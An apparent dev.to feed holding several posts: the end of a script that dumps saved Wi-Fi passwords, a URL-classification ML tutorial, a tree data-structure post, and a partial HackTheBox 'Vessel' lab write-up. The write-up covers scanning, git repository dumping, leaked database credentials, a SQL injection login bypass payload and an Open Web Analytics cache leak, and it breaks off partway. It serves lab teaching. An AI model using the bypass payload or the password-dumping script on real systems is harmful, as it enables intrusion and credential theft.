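    """NetworkManager equivalent (Linux): connection names via nmcli, PSKs via
    --show-secrets (-s). Reading the PSK requires root."""
    result = {}
    for line in run(["nmcli", "-g", "NAME,TYPE", "connection", "show"]).splitlines():
        name, _, ctype = line.rpartition(":")      # nmcli escapes ':' inside names as '\:'
        if ctype == "802-11-wireless":
            name = name.replace("\\:", ":")
            psk = run(["nmcli", "-s", "-g", "802-11-wireless-security.psk",
                       "connection", "show", name]).strip()
            result[name] = psk or None
    return result


# Constructed sample output (not captured from a real machine) for offline testing.
SAMPLE_PROFILES = """
Profiles on interface Wi-Fi:

User profiles
-------------
    All User Profile     : Home Network 5G
    All User Profile     : CoffeeShop
"""
SAMPLE_KEYED = """
Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : p@ss:word with spaces
"""
SAMPLE_OPEN = """
Security settings
-----------------
    Authentication         : Open
    Security key           : Absent
"""

if __name__ == "__main__":
    found = windows_passwords() if platform.system() == "Windows" else linux_passwords()
    for name, key in found.items():
        print(f"{name:30}| {key if key is not None else '(open network, no key stored)'}")
```

&lt;p&gt;The parsing functions are separate from the command execution so they can be exercised against the constructed samples without a wireless adapter; the same split is what makes the script portable across locales, since only the two label strings would need changing on a non-English Windows.&lt;/p&gt;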

</description>
      <category>hacking</category>
      <category>network</category>
    </item>
    <item>
      <title>Train Url prediction</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Mon, 13 Mar 2023 06:50:15 +0000</pubDate>
      <link>https://dev.to/codeninjausman/train-url-prediction-1c6c</link>
      <guid>https://dev.to/codeninjausman/train-url-prediction-1c6c</guid>
      <description>&lt;p&gt;As we navigate through an increasingly digitized world, the threat of cyber attacks looms large, making it crucial to have robust measures in place to protect ourselves. One such measure is the use of machine learning models to predict whether a URL is malicious or benign, and in this blog, we will explore just that.&lt;br&gt;
The success of any machine learning model depends on the quality of the data it is trained on. In the case of building a model to predict whether a URL is malicious or benign, we need a dataset that contains examples of both types of URLs. &lt;br&gt;
I found the perfect example of that &lt;a href="https://www.kaggle.com/datasets/teseract/urldataset"&gt;Dataset&lt;/a&gt;&lt;/p&gt;
&lt;h1&gt;
  
  
  Preprocessing
&lt;/h1&gt;

&lt;p&gt;Preprocessing prepares the raw data for the model: handling missing values, removing duplicates and outliers, scaling numeric features and encoding categorical ones. The quality of the data bounds the quality of the model, so this step removes noise and inconsistencies, puts the features in a form the learning algorithm accepts, and can reduce training cost by dropping irrelevant or redundant features. For this dataset the preprocessing is light: normalise the labels, check the class balance, and drop duplicate rows.&lt;br&gt;
&lt;strong&gt;Imports&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Imports
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import train_test_split
import pickle
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Reading the dataset&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Read the CSV file
df = pd.read_csv('data.csv',index_col=False)

# Print the first 5 rows of the data
df.head()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Columns&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Print the column labels of the data
df.columns
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Unique labels&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Print all unique values in the 'label' column
print(df['label'].unique())
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;The dataset labels URLs as good or bad; we rename them to benign and malicious&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;label_map = {'bad': "malicious", 'good': "benign"}

# map() renames each label; the values stay categorical strings, not numbers
df['label'] = df['label'].map(label_map)
# Print all unique values in the 'label' column
print(df['label'].unique())
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Class balance: percentage of benign and malicious URLs&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# calculate the percentage of 'benign' and 'malicious' labels
label_counts = df['label'].value_counts(normalize=True)
benign_percent = label_counts['benign'] * 100
malicious_percent = label_counts['malicious'] * 100

# create a pie chart
labels = ['Benign', 'Malicious']
sizes = [benign_percent, malicious_percent]
colors = ['green', 'red']
explode = (0, 0.1)

plt.pie(sizes, explode=explode, labels=labels, colors=colors,
        autopct='%1.1f%%', shadow=True, startangle=90)
plt.axis('equal')

plt.show()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Removing Duplicates:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# remove the duplicate rows based on all columns
df = df.drop_duplicates()
df.head()
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h1&gt;
  
  
  &lt;strong&gt;Training&lt;/strong&gt;
&lt;/h1&gt;

&lt;p&gt;Training teaches the model to make accurate predictions by adjusting its internal parameters from labelled examples: the model is shown the training set and its parameters are updated to reduce the gap between its predictions and the true labels. The goal is a model that generalises to unseen data by learning the underlying patterns rather than memorising the examples, which means balancing overfitting against underfitting. How well this works depends on the size and diversity of the training data, the capacity of the model and the optimisation method. The trained model is then evaluated on a separate test set that it never saw during training.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Split Dataset&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;X = df['url']
y = df['label']
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Making a model&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from sklearn.feature_extraction.text import TfidfVectorizer

vectorizer = TfidfVectorizer()
X_train = vectorizer.fit_transform(X_train)
X_test = vectorizer.transform(X_test)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Train the model&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;rf = RandomForestClassifier(n_estimators=100, random_state=42)
rf.fit(X_train, y_train)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Getting accuracy&lt;/strong&gt;&lt;br&gt;
If the class balance above is skewed, accuracy alone flatters the model: predicting benign for everything would already score the benign percentage. Read the confusion matrix as well, where the malicious URLs classified as benign (false negatives) are the costly mistakes.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;from sklearn.metrics import accuracy_score, confusion_matrix

y_pred = rf.predict(X_test)
print("Accuracy:", accuracy_score(y_test, y_pred))
print("Confusion matrix:\n", confusion_matrix(y_test, y_pred))
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Storing the model as a pkl file:&lt;/strong&gt;&lt;br&gt;
The fitted vectorizer must be saved together with the classifier. A new URL can only be predicted after it has been transformed with the same vocabulary and IDF weights the model was trained on, so a fresh process that loads only the classifier has nothing to transform it with.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# Persist the fitted vectorizer and the trained classifier as one object
with open('model.pkl', 'wb') as f:
    pickle.dump({'vectorizer': vectorizer, 'model': rf}, f)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;How to use the model.pkl:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;import pickle

# Only unpickle files you produced yourself: pickle.load runs code embedded in
# the file, so loading a model.pkl from an untrusted source is arbitrary code exec.
with open('model.pkl', 'rb') as f:
    saved = pickle.load(f)
vectorizer, model = saved['vectorizer'], saved['model']

new_url = ['google.com/../../etc/pwd']
new_url_transformed = vectorizer.transform(new_url)
prediction = model.predict(new_url_transformed)
print(prediction)
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This will output either 'malicious' or 'benign' depending on the prediction of the model. Note what the model actually sees for this URL: the default TfidfVectorizer tokenizer keeps only word tokens of two or more word characters, so the ../ never reaches the classifier and the prediction rests on the tokens google, com, etc and pwd.&lt;/p&gt;

&lt;h1&gt;
  
  
  Summary
&lt;/h1&gt;

&lt;p&gt;In this post we covered three key steps of a machine learning workflow: finding a dataset, preprocessing it and training a model. The dataset has to be representative of the URLs the model will meet in practice. Preprocessing turns the raw data into a form the model accepts, and the choice of features decides what the model can see at all. Training adjusts the model's parameters from labelled examples, and evaluating it on held-out data, with a confusion matrix rather than accuracy alone, shows whether it generalises. Each of these steps has a large effect on how useful the resulting model is.&lt;/p&gt;

&lt;h4&gt;
  
  
  The code can be found at &lt;a href="https://www.kaggle.com/code/codeninjausman/url-prediction"&gt;Kaggle&lt;/a&gt;
&lt;/h4&gt;

</description>
      <category>datascience</category>
      <category>python</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Tree Structures</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Tue, 07 Mar 2023 05:22:57 +0000</pubDate>
      <link>https://dev.to/codeninjausman/tree-structures-1g82</link>
      <guid>https://dev.to/codeninjausman/tree-structures-1g82</guid>
      <description>&lt;h2&gt;
  
  
  Definition:
&lt;/h2&gt;

&lt;p&gt;A tree structure, tree diagram, or tree model is a way of representing the hierarchical nature of a structure in a graphical form.&lt;/p&gt;

&lt;h2&gt;
  
  
  Practical Usage
&lt;/h2&gt;

&lt;p&gt;Tree structures have a wide range of practical uses in computer science and programming. Here are some common examples:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;File systems: File systems are often represented as tree structures, with directories as nodes and files as leaves. Each directory node can have one or more child nodes (sub-directories or files), forming a hierarchical structure that allows for efficient storage and retrieval of files.&lt;/li&gt;
&lt;li&gt;Representing hierarchical data: Trees can be used to represent any kind of hierarchical data, such as organizational charts, family trees, and taxonomies. Each node in the tree represents a category or sub-category, and the edges between nodes represent the relationship between them.&lt;/li&gt;
&lt;li&gt;Implementing search algorithms: Trees can be used to implement search algorithms such as binary search and breadth-first search. Binary search trees are particularly useful for searching for data in sorted lists, while breadth-first search trees can be used to search through large graphs or networks.&lt;/li&gt;
&lt;li&gt;Decision trees: Decision trees are used in machine learning and data mining to model decisions and their possible consequences. Each node in the tree represents a decision point, and the edges represent the possible outcomes or consequences of that decision.&lt;/li&gt;
&lt;li&gt;Syntax trees: Syntax trees are used in natural language processing to represent the structure of sentences in a language. Each node in the tree represents a part of speech or a phrase, and the edges represent the relationships between them.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Overall, tree structures have a wide range of practical uses in computer science and programming, and their flexibility and efficiency make them a valuable tool for solving many different kinds of problems.&lt;/p&gt;

&lt;h2&gt;
  
  
  Example
&lt;/h2&gt;


&lt;p&gt;In this example, we define a Node class that has a value attribute and a list of child nodes. We also define an add_child method to add child nodes to a parent node.&lt;/p&gt;

&lt;p&gt;To create a tree, we first create a root node (in this case with a value of 1), and then add child nodes to it using the add_child method. In this example, we add two child nodes with values of 2 and 3 to the root node.&lt;/p&gt;
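&lt;p&gt;An added example, not the article's own gist: the Node class described above in JavaScript, with the breadth-first traversal mentioned under Practical Usage, a root-to-node path lookup and a height function. Node, addChild, bfsValues, findPath, height and buildSampleTree are this example's own names.&lt;/p&gt;

```javascript
// Added example: an n-ary tree node as described in the article, plus the
// breadth-first search the article mentions. Names are this example's own.
class Node {
  constructor(value) {
    this.value = value;
    this.children = [];
  }

  // Attach a child node and return it so calls can be chained.
  addChild(child) {
    this.children.push(child);
    return child;
  }
}

// Breadth-first traversal: visit level by level using a FIFO queue.
function bfsValues(root) {
  const order = [];
  const queue = [root];
  while (queue.length !== 0) {
    const node = queue.shift();
    order.push(node.value);
    for (const child of node.children) {
      queue.push(child);
    }
  }
  return order;
}

// Depth-first search returning the list of values from the root to the
// first node holding `target`, or null when no such node exists.
function findPath(root, target) {
  const stack = [[root, [root.value]]];
  while (stack.length !== 0) {
    const [node, path] = stack.pop();
    if (node.value === target) {
      return path;
    }
    // Push children in reverse so the leftmost child is explored first.
    for (let i = node.children.length - 1; i !== -1; i -= 1) {
      const child = node.children[i];
      stack.push([child, path.concat(child.value)]);
    }
  }
  return null;
}

// Height of the tree: a lone root has height 0.
function height(node) {
  let deepest = -1;
  for (const child of node.children) {
    deepest = Math.max(deepest, height(child));
  }
  return deepest + 1;
}

// Build the tree from the article: root 1 with children 2 and 3,
// plus one grandchild (4 under 2) so the traversals have depth to show.
function buildSampleTree() {
  const root = new Node(1);
  const two = root.addChild(new Node(2));
  root.addChild(new Node(3));
  two.addChild(new Node(4));
  return root;
}
```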

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Tree structures are a fundamental data structure in computer science that are used to represent hierarchical relationships between elements. Trees consist of nodes connected by edges, with each node having zero or more child nodes.&lt;/p&gt;

&lt;p&gt;Some common use cases for trees include representing file systems, representing the structure of a website or an organization, and implementing search algorithms such as binary search.&lt;/p&gt;

&lt;p&gt;There are many types of trees, including binary trees, n-ary trees, and balanced trees such as AVL trees and red-black trees. Each type of tree has its own advantages and disadvantages, and the choice of which type of tree to use depends on the specific requirements of the problem being solved.&lt;/p&gt;

&lt;p&gt;Overall, trees are a powerful and flexible data structure that can be used in a wide range of applications. Understanding the basics of trees and how to implement them can be a valuable skill for any computer scientist or programmer.&lt;/p&gt;

&lt;h6&gt;
  
  
  Thank you....
&lt;/h6&gt;

</description>
      <category>python</category>
      <category>datastructure</category>
      <category>cpp</category>
    </item>
    <item>
      <title>HACKTHEBOX (HTB) WRITEUP: VESSEL [HARD]</title>
      <dc:creator>Muhammad Usman</dc:creator>
      <pubDate>Sun, 05 Mar 2023 15:31:35 +0000</pubDate>
      <link>https://dev.to/codeninjausman/hackthebox-htb-writeup-vessel-hard-10bb</link>
      <guid>https://dev.to/codeninjausman/hackthebox-htb-writeup-vessel-hard-10bb</guid>
      <description>&lt;h2&gt;
  
  
  Objectives
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;User flag&lt;/li&gt;
&lt;li&gt;Root flag&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  SCANNING
&lt;/h2&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; TARGET=10.129.112.189 &amp;amp;&amp;amp; nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Vessel
|_http-favicon: Unknown favicon MD5: 9A251AF46E55C650807793D0DB9C38B8
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  WEB ENUM
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Inspecting the web page reveals a domain name, vessel.htb; add this to /etc/hosts.&lt;/li&gt;
&lt;li&gt;Registering an account at &lt;a href="http://vessel.htb/register"&gt;http://vessel.htb/register&lt;/a&gt; shows that registration is currently not available.&lt;/li&gt;
&lt;li&gt;Inspecting the traffic reveals a connect.sid cookie, which indicates a Node.js Express application.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;POST /api/register HTTP/1.1
Host: vessel.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Origin: http://vessel.htb
Connection: close
Referer: http://vessel.htb/register
Cookie: connect.sid=s%3ARkA_yhB0F8t4odxYkuBR7mSZW-eC_dHI.%2BQIqgvsy53mYn4YE12ma%2BtBKcRNpCaLdzcM4d5Gd81U
Upgrade-Insecure-Requests: 1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Running a path scan finds a path called /dev.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; dirsearch -u http://vessel.htb/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Continuing dirsearch under /dev shows that it is a git repository.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; dirsearch -u http://vessel.htb/dev
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Use git-dumper to dump the git repository.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; python3 ~/tools/git-dumper/git_dumper.py http://vessel.htb/dev repo
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Note that there might be an error saying 'Index' object has no attribute 'iterblobs'; to fix it, pin your dulwich version to 0.20.20.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; python3 -m pip install dulwich==0.20.20
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Subdomain enumeration didn't find anything.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://vessel.htb/" -H "Host: FUZZ.vessel.htb"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  SOURCE CODE INSPECTION
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;Inspect the git log of the leaked repository.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;&amp;gt; git log
commit 208167e785aae5b052a4a2f9843d74e733fbd917 (HEAD -&amp;gt; master)
Author: Ethan &amp;lt;ethan@vessel.htb&amp;gt;
Date:   Mon Aug 22 10:11:34 2022 -0400
    Potential security fixes
commit edb18f3e0cd9ee39769ff3951eeb799dd1d8517e
Author: Ethan &amp;lt;ethan@vessel.htb&amp;gt;
Date:   Fri Aug 12 14:19:19 2022 -0400
    Security Fixes
commit f1369cfecb4a3125ec4060f1a725ce4aa6cbecd3
Author: Ethan &amp;lt;ethan@vessel.htb&amp;gt;
Date:   Wed Aug 10 15:16:56 2022 -0400
    Initial commit
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;From the git log, the developer's name is found to be Ethan.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Author: Ethan &amp;lt;ethan@vessel.htb&amp;gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Found DB credentials in config/db.js.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;var connection = {
        db: {
        host     : 'localhost',
        user     : 'default',
        password : 'daqvACHKvRn84VdVp',
        database : 'vessel'
}};
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  BYPASS WEB LOGIN
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;By inspecting the code, it seems that the SQL injection issue has been fixed in /routes/inject.js by using a parameterised query.
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;router.post('/api/login', function(req, res) {
    let username = req.body.username;
    let password = req.body.password;
    if (username &amp;amp;&amp;amp; password) {
        connection.query('SELECT * FROM accounts WHERE username = ? AND password = ?', [username, password], function(error, results, fields) {
            if (error) throw error;
            if (results.length &amp;gt; 0) {
                req.session.loggedin = true;
                req.session.username = username;
                req.flash('success', 'Succesfully logged in!');
                res.redirect('/admin');
            } else {
                req.flash('error', 'Wrong credentials! Try Again!');
                res.redirect('/login');
            }           
            res.end();
        });
    } else {
        res.redirect('/login');
    }
});
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;However, note that the username and password fields can arrive as objects instead of strings, and the query escaper then expands the object rather than quoting it. For more detail see this post: &lt;a href="https://www.stackhawk.com/blog/node-js-sql-injection-guide-examples-and-prevention/"&gt;https://www.stackhawk.com/blog/node-js-sql-injection-guide-examples-and-prevention/&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;So, to bypass the auth check, run Burp to intercept the traffic, send a login request, and then in Burp change the request body to the following:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;username=admin&amp;amp;password[password]=1
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
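&lt;p&gt;A defender's counterpart to the bypass above, added here and not taken from the Vessel repository: reject anything that is not a string before it can reach the query, and compare against a password hash rather than a plaintext column. The function and fixture names (validateCredentials, loginHandler, fakeFindUser, fakeVerify, BYPASS_BODY) are this example's own, and the parsed body is constructed to match what an extended url-encoded body parser produces for the request above.&lt;/p&gt;

```javascript
// Added example (not from the leaked Vessel repo): hardening /api/login
// against the object-instead-of-string trick. With an extended url-encoded
// parser, the body from the write-up arrives as
// { username: 'admin', password: { password: '1' } }, and a query escaper
// that expands objects into `key = value` pairs rewrites the WHERE clause.

const MAX_FIELD_LENGTH = 255;

// Accept only plain, non-empty strings of bounded length for both fields.
// Returns { username, password } or null when anything else arrives.
function validateCredentials(body) {
  if (body === null || typeof body !== 'object') {
    return null;
  }
  const out = {};
  for (const name of ['username', 'password']) {
    const value = body[name];
    if (typeof value !== 'string') {
      return null; // object, array, number or missing: refuse, do not coerce
    }
    // Math.max(...) differs from MAX_FIELD_LENGTH exactly when value is too long.
    if (value.length === 0 || Math.max(value.length, MAX_FIELD_LENGTH) !== MAX_FIELD_LENGTH) {
      return null;
    }
    out[name] = value;
  }
  return out;
}

// Login logic with the database access injected so it runs offline.
// In production findUserByName runs a parameterised lookup with a single
// string bind ('... WHERE username = ?', [username]) and verifyPassword is a
// real password-hash comparison (e.g. bcrypt.compare); a plaintext password
// column compared in SQL, as in the leaked route, should not exist at all.
function loginHandler(body, findUserByName, verifyPassword) {
  const creds = validateCredentials(body);
  if (creds === null) {
    return { status: 400, loggedIn: false, reason: 'malformed credentials' };
  }
  const user = findUserByName(creds.username);
  if (!user || !verifyPassword(creds.password, user.passwordHash)) {
    return { status: 401, loggedIn: false, reason: 'wrong credentials' };
  }
  return { status: 302, loggedIn: true, username: creds.username };
}

// Constructed fixtures for the demonstration; not real Vessel data.
const FAKE_USERS = { admin: { passwordHash: 'fakehash:correct-horse' } };

function fakeFindUser(username) {
  // hasOwnProperty avoids matching prototype names such as 'constructor'.
  if (Object.prototype.hasOwnProperty.call(FAKE_USERS, username)) {
    return FAKE_USERS[username];
  }
  return null;
}

function fakeVerify(password, hash) {
  // Stand-in for bcrypt.compare(); only for the offline demo.
  return hash === 'fakehash:' + password;
}

// The exact body the write-up sends, as the extended parser delivers it.
const BYPASS_BODY = { username: 'admin', password: { password: '1' } };
```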



&lt;ul&gt;
&lt;li&gt;Bypass the login to get to the admin dashboard. Under the user icon there is a button to Analytics, where a new subdomain is found: openwebanalytics.vessel.htb. Add this to /etc/hosts.&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  OPENWEBANALYTICS
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;With some searches online, it is found that Open Web Analytics (OWA) is vulnerable to a recently discovered vulnerability: &lt;a href="https://www.cvedetails.com/cve/CVE-2022-24637/"&gt;https://www.cvedetails.com/cve/CVE-2022-24637/&lt;/a&gt;, more detail can be found here: &lt;a href="https://devel0pment.de/?p=2494"&gt;https://devel0pment.de/?p=2494&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;The vulnerable source code can be found here: &lt;a href="https://github.com/Open-Web-Analytics/Open-Web-Analytics/tree/1.7.3"&gt;https://github.com/Open-Web-Analytics/Open-Web-Analytics/tree/1.7.3&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Inspecting the code in modules/base/classes/fileCache.php: a cache file is generated for each corresponding action, and the cache file is stored at
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;$cache_file = $this-&amp;gt;makeCollectionDirPath($collection).$id.'.php';
# this corresponds to http://openwebanalytics.vessel.htb/owa-data/caches/1/
# cache_id is 1 by default
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;The cache file is named using the id of the user, in the format md5(id1).&lt;/li&gt;
&lt;li&gt;So, for the user with an id of 1, the cache name would be: fafe1b60c24107ccd8f4562213e44849&lt;/li&gt;
&lt;li&gt;Using &lt;a href="http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm"&gt;http://openwebanalytics.vessel.htb/index.php?owa_do=base.passwordResetForm&lt;/a&gt;, we can figure out a valid email, &lt;a href="mailto:admin@vessel.htb"&gt;admin@vessel.htb&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;I assume this user has an id of 1, and in the end it turns out to be true.&lt;/li&gt;
&lt;li&gt;We can attempt to log in using this account; even a failed login will generate the cache file under: &lt;a href="http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_configuration/"&gt;http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_configuration/&lt;/a&gt;, yet this cache doesn't contain any sensitive user info. So we need to find other corresponding actions to generate other caches.&lt;/li&gt;
&lt;li&gt;With some Google searching, I found someone else's website running OWA, which revealed how the cache files are named. The way I searched was using Google search operators:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;inurl: "owa-data/caches"
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ul&gt;
&lt;li&gt;Later, I found that by requesting a password reset for the user &lt;a href="mailto:admin@vessel.htb"&gt;admin@vessel.htb&lt;/a&gt;, a cache will be generated at &lt;a href="http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php"&gt;http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php&lt;/a&gt;. This can be observed because when a cache file is there, the path &lt;a href="http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/"&gt;http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/&lt;/a&gt; will display a blank page instead of the directory listing view.&lt;/li&gt;
&lt;li&gt;Check the content of the file:
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;# get the base64 encoded content and then decode it
&amp;gt; curl http://openwebanalytics.vessel.htb/owa-data/caches/1/owa_user/fafe1b60c24107ccd8f4562213e44849.php
